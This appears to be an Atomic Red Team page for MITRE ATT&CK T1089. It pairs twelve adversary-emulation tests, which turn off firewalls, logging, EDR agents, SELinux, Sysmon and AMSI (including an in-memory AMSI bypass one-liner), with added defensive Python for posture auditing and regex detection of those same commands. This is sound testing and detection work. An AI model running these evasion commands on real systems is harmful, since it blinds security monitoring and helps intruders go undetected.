# T1089 - Disabling Security Tools

## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1089)

<blockquote>Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security scanning or event reporting.</blockquote>

## Atomic Tests

- [Atomic Test #1 - Disable iptables firewall](#atomic-test-1---disable-iptables-firewall)
- [Atomic Test #2 - Disable syslog](#atomic-test-2---disable-syslog)
- [Atomic Test #3 - Disable Cb Response](#atomic-test-3---disable-cb-response)
- [Atomic Test #4 - Disable SELinux](#atomic-test-4---disable-selinux)
- [Atomic Test #5 - Disable Carbon Black Response](#atomic-test-5---disable-carbon-black-response)
- [Atomic Test #6 - Disable LittleSnitch](#atomic-test-6---disable-littlesnitch)
- [Atomic Test #7 - Disable OpenDNS Umbrella](#atomic-test-7---disable-opendns-umbrella)
- [Atomic Test #8 - Unload Sysmon Filter Driver](#atomic-test-8---unload-sysmon-filter-driver)
- [Atomic Test #9 - Disable Windows IIS HTTP Logging](#atomic-test-9---disable-windows-iis-http-logging)
- [Atomic Test #10 - Uninstall Sysmon](#atomic-test-10---uninstall-sysmon)
- [Atomic Test #11 - AMSI Bypass - AMSI InitFailed](#atomic-test-11---amsi-bypass---amsi-initfailed)
- [Atomic Test #12 - AMSI Bypass - Remove AMSI Provider Reg Key](#atomic-test-12---amsi-bypass---remove-amsi-provider-reg-key)

## Atomic Test #1 - Disable iptables firewall

Disables the iptables firewall

**Supported Platforms:** Linux

#### Run it with `sh`!

```
# Read the CentOS major version once; an unquoted empty result would break the test
ver=$(rpm -q --queryformat '%{VERSION}' centos-release 2>/dev/null)
if [ "$ver" = "6" ]; then
  # CentOS 6: SysV init scripts (chkconfig takes the service name before on/off)
  service iptables stop
  chkconfig iptables off
  service ip6tables stop
  chkconfig ip6tables off
elif [ "$ver" = "7" ]; then
  # CentOS 7: firewalld under systemd
  systemctl stop firewalld
  systemctl disable firewalld
fi
```

## Atomic Test #2 - Disable syslog

Disables syslog collection

**Supported Platforms:** Linux

#### Run it with `sh`!

```
ver=$(rpm -q --queryformat '%{VERSION}' centos-release 2>/dev/null)
if [ "$ver" = "6" ]; then
  # CentOS 6: SysV init scripts
  service rsyslog stop
  chkconfig rsyslog off
elif [ "$ver" = "7" ]; then
  # CentOS 7: systemd unit
  systemctl stop rsyslog
  systemctl disable rsyslog
fi
```

## Atomic Test #3 - Disable Cb Response

Disable the Cb Response service

**Supported Platforms:** Linux

#### Run it with `sh`!

```
ver=$(rpm -q --queryformat '%{VERSION}' centos-release 2>/dev/null)
if [ "$ver" = "6" ]; then
  # CentOS 6: SysV init scripts
  service cbdaemon stop
  chkconfig cbdaemon off
elif [ "$ver" = "7" ]; then
  # CentOS 7: systemd unit
  systemctl stop cbdaemon
  systemctl disable cbdaemon
fi
```

## Atomic Test #4 - Disable SELinux

Disables SELinux enforcement

**Supported Platforms:** Linux

#### Run it with `sh`!

```
setenforce 0
```

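Tests #1 through #4 each leave a Linux control stopped, disabled at boot, or in permissive mode. The following posture audit is an added example (not Atomic Red Team code) of how a defender verifies, after such a test or as a scheduled check, that every one of those controls is still in its healthy state. It assumes a systemd host (CentOS 7 or later) with `systemctl` and `getenforce` on PATH; on CentOS 6 the equivalent queries would be `service ... status` and `chkconfig --list`. The evaluation is a pure function of the reported state strings, so the logic can be exercised without a CentOS box.

```python
"""Posture audit for the Linux controls exercised by Atomic Tests #1-#4.

Added example, not part of Atomic Red Team. Rather than hunting for the
attacker's commands, it asks the host what state each control is in now and
reports drift from the expected state. Assumes a systemd host (CentOS 7+).
"""
import shutil
import subprocess

# control name -> (query command, output that means "healthy").
# `systemctl is-active` / `is-enabled` print a single word; `getenforce`
# prints Enforcing, Permissive or Disabled.
CONTROLS = {
    "firewalld (running)": (["systemctl", "is-active", "firewalld"], "active"),
    "firewalld (at boot)": (["systemctl", "is-enabled", "firewalld"], "enabled"),
    "rsyslog (running)":   (["systemctl", "is-active", "rsyslog"], "active"),
    "rsyslog (at boot)":   (["systemctl", "is-enabled", "rsyslog"], "enabled"),
    "cbdaemon (running)":  (["systemctl", "is-active", "cbdaemon"], "active"),
    "cbdaemon (at boot)":  (["systemctl", "is-enabled", "cbdaemon"], "enabled"),
    "SELinux mode":        (["getenforce"], "Enforcing"),
}


def query(cmd):
    """Run one state query; return its stdout stripped, or None if it could not run.

    The exit status is deliberately ignored: systemctl exits non-zero for
    'inactive' / 'disabled', and that word is exactly the answer we want.
    """
    if shutil.which(cmd[0]) is None:
        return None
    try:
        proc = subprocess.run(cmd, capture_output=True, text=True, timeout=10)
    except (OSError, subprocess.SubprocessError):
        return None
    return proc.stdout.strip() or None


def collect():
    """Query every control on this host."""
    return {name: query(cmd) for name, (cmd, _) in CONTROLS.items()}


def evaluate(observed):
    """Return {control: reason} for each control that is not in its healthy state.

    `observed` maps a control name to the reported state string, or None when
    the query produced nothing (tool absent, unit not installed).
    """
    findings = {}
    for name, (_, healthy) in CONTROLS.items():
        state = observed.get(name)
        if state is None:
            findings[name] = "no answer (tool or unit not present)"
        elif state != healthy:
            findings[name] = f"expected {healthy!r}, got {state!r}"
    return findings


def main():
    findings = evaluate(collect())
    if not findings:
        print("all controls healthy")
    for name, reason in findings.items():
        print(f"FINDING {name}: {reason}")
    return 1 if findings else 0


if __name__ == "__main__":
    raise SystemExit(main())
```

A non-zero exit code makes the script usable from cron or a configuration-management run, and "no answer" is reported as a finding rather than silently skipped, since a missing unit is indistinguishable from an uninstalled agent from the auditor's point of view.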
## Atomic Test #5 - Disable Carbon Black Response

Disables Carbon Black Response

**Supported Platforms:** macOS

#### Run it with `sh`!

```
sudo launchctl unload /Library/LaunchDaemons/com.carbonblack.daemon.plist
```

## Atomic Test #6 - Disable LittleSnitch

Disables LittleSnitch

**Supported Platforms:** macOS

#### Run it with `sh`!

```
sudo launchctl unload /Library/LaunchDaemons/at.obdev.littlesnitchd.plist
```

## Atomic Test #7 - Disable OpenDNS Umbrella

Disables OpenDNS Umbrella

**Supported Platforms:** macOS

#### Run it with `sh`!

```
sudo launchctl unload /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfigUpdater.plist
```

## Atomic Test #8 - Unload Sysmon Filter Driver

Unloads the Sysinternals Sysmon filter driver without stopping the Sysmon service.

**Supported Platforms:** Windows

#### Inputs

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| sysmon_driver | The name of the Sysmon filter driver (this can change from the default) | string | SysmonDrv |

#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)

```
fltmc.exe unload #{sysmon_driver}
```

#### Commands to Check Prerequisites:

```
fltmc.exe filters | findstr #{sysmon_driver}
```

#### Cleanup Commands:

```
sc stop sysmon
fltmc.exe load #{sysmon_driver}
sc start sysmon
```

## Atomic Test #9 - Disable Windows IIS HTTP Logging

Disables HTTP logging on a Windows IIS web server, a technique observed in use by Threat Group 3390 (Bronze Union).

This action requires the HTTP logging configuration section in IIS to be unlocked.

**Supported Platforms:** Windows

#### Inputs

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| website_name | The name of the website on a server | string | Default Web Site |

#### Run it with `command_prompt`!

```
C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}" /section:httplogging /dontLog:true
```

## Atomic Test #10 - Uninstall Sysmon

Uninstall Sysinternals Sysmon for Defense Evasion

**Supported Platforms:** Windows

#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)

```
sysmon -u
```

#### Commands to Check Prerequisites:

```
sc query sysmon > nul
```

#### Cleanup Commands:

```
sysmon -i -accepteula
```

## Atomic Test #11 - AMSI Bypass - AMSI InitFailed

An easy way to bypass AMSI inspection is to patch the DLL in memory, setting the "amsiInitFailed" field to true.

https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/

**Supported Platforms:** Windows

#### Run it with `powershell`!

```
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
```

#### Cleanup Commands:

```
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$false)
```

## Atomic Test #12 - AMSI Bypass - Remove AMSI Provider Reg Key

With administrative rights, an adversary can remove the AMSI Provider registry key in HKLM\Software\Microsoft\AMSI to disable AMSI inspection.

This test removes the Windows Defender provider registry key.

**Supported Platforms:** Windows

#### Run it with `powershell`! Elevation Required (e.g. root or admin)

```
Remove-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}" -Recurse
```

#### Cleanup Commands:

```
New-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers" -Name "{2781761E-28E0-4109-99FE-B9D127C57AFE}"
```
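Every test on this page leaves a trace in endpoint telemetry: a process command line (Tests #1 through #10), a registry key deletion (Test #12) or a PowerShell script block (Test #11). The detection logic below is an added example, not part of Atomic Red Team or the cited blog post, of matching those traces and grouping hits per host, since several of these tests landing on one host in sequence is the stronger signal than any single hit. The event records are constructed, simplified renderings of Sysmon Event ID 1 (process create), Sysmon Event ID 12 (registry key delete) and PowerShell Event ID 4104 (script block) records; the field names `cmdline`, `target` and `text`, the hostnames and the user names are assumptions chosen for readability, not the real schema.

```python
"""Detection logic for the T1089 atomic tests over constructed endpoint events.

Added example, not Atomic Red Team code. Each event is a dict whose `kind` is
process (Sysmon Event ID 1), registry_delete (Sysmon Event ID 12, DeleteKey)
or scriptblock (PowerShell Event ID 4104). Field names are assumptions.
"""
import re
from collections import defaultdict

# Which field of each event kind a rule inspects.
FIELD = {"process": "cmdline", "registry_delete": "target", "scriptblock": "text"}

# (label, event kind, pattern). Labels name the atomic test the activity matches.
RULES = [
    ("Atomic #1-#3: Linux security service stopped or disabled", "process",
     re.compile(r"systemctl\s+(stop|disable)\s+(firewalld|rsyslog|cbdaemon)\b"
                r"|service\s+(iptables|ip6tables|rsyslog|cbdaemon)\s+stop\b"
                r"|chkconfig\s+(iptables|ip6tables|rsyslog|cbdaemon)\s+off\b")),
    ("Atomic #4: SELinux switched to permissive", "process",
     re.compile(r"\bsetenforce\s+0\b")),
    ("Atomic #5-#7: macOS security daemon unloaded", "process",
     re.compile(r"launchctl\s+unload\s+\S*(com\.carbonblack\.daemon"
                r"|at\.obdev\.littlesnitchd|com\.opendns\.osx)")),
    ("Atomic #8: Sysmon filter driver unloaded", "process",
     re.compile(r"\bfltmc(\.exe)?\s+unload\b", re.I)),
    ("Atomic #9: IIS HTTP logging disabled", "process",
     re.compile(r"appcmd(\.exe)?\s+set\s+config\b.*httplogging.*dontLog:true", re.I)),
    ("Atomic #10: Sysmon uninstalled", "process",
     re.compile(r"\bsysmon(64)?(\.exe)?\s+-u\b", re.I)),
    ("Atomic #11: AMSI amsiInitFailed patched in memory", "scriptblock",
     re.compile(r"amsiInitFailed", re.I)),
    ("Atomic #12: AMSI provider registry key deleted", "registry_delete",
     re.compile(r"HKLM\\SOFTWARE\\Microsoft\\AMSI\\Providers\\\{[0-9A-F-]+\}", re.I)),
]


def detect(events):
    """Return [(event_index, label)] for every rule that fires on every event."""
    hits = []
    for i, ev in enumerate(events):
        field = FIELD.get(ev.get("kind"))
        if field is None:
            continue                      # unknown kind: nothing to inspect
        value = ev.get(field, "")
        for label, kind, pattern in RULES:
            if kind == ev["kind"] and pattern.search(value):
                hits.append((i, label))
    return hits


def group_by_host(events):
    """Map host -> list of labels; a host accumulating several is the strong signal."""
    per_host = defaultdict(list)
    for i, label in detect(events):
        per_host[events[i].get("host", "?")].append(label)
    return dict(per_host)


# Constructed sample telemetry; hostnames, users and ordering are made up.
SAMPLE_EVENTS = [
    {"kind": "process", "host": "web01", "user": r"CORP\svc_iis",
     "cmdline": r'C:\Windows\System32\inetsrv\appcmd.exe set config "Default Web Site" /section:httplogging /dontLog:true'},
    {"kind": "process", "host": "ws07", "user": r"CORP\jdoe",
     "cmdline": "fltmc.exe filters"},          # benign: only lists loaded filters
    {"kind": "process", "host": "ws07", "user": r"CORP\jdoe",
     "cmdline": "fltmc.exe unload SysmonDrv"},
    {"kind": "process", "host": "ws07", "user": r"CORP\jdoe",
     "cmdline": "sysmon64.exe -u"},
    {"kind": "registry_delete", "host": "ws07", "user": r"CORP\jdoe",
     "target": r"HKLM\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}"},
    {"kind": "scriptblock", "host": "ws07", "user": r"CORP\jdoe",
     "text": "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')"
             ".GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)"},
    {"kind": "process", "host": "lx03", "user": "root", "cmdline": "setenforce 0"},
    {"kind": "process", "host": "lx03", "user": "root",
     "cmdline": "systemctl status rsyslog"},   # benign: status query, not stop/disable
    {"kind": "process", "host": "mac02", "user": "root",
     "cmdline": "launchctl unload /Library/LaunchDaemons/at.obdev.littlesnitchd.plist"},
]


if __name__ == "__main__":
    for host, labels in group_by_host(SAMPLE_EVENTS).items():
        print(f"{host}: {len(labels)} hit(s)")
        for label in labels:
            print(f"  - {label}")
```

The benign `fltmc.exe filters` and `systemctl status` records are included on purpose: the prerequisite-check commands on this page look a lot like the tests themselves, and a rule keyed on the tool name alone would page on every health check. Matching on the disabling verb (`unload`, `stop`, `disable`, `-u`, `dontLog:true`) keeps those out while still catching the variants shown in Tests #8 and #10.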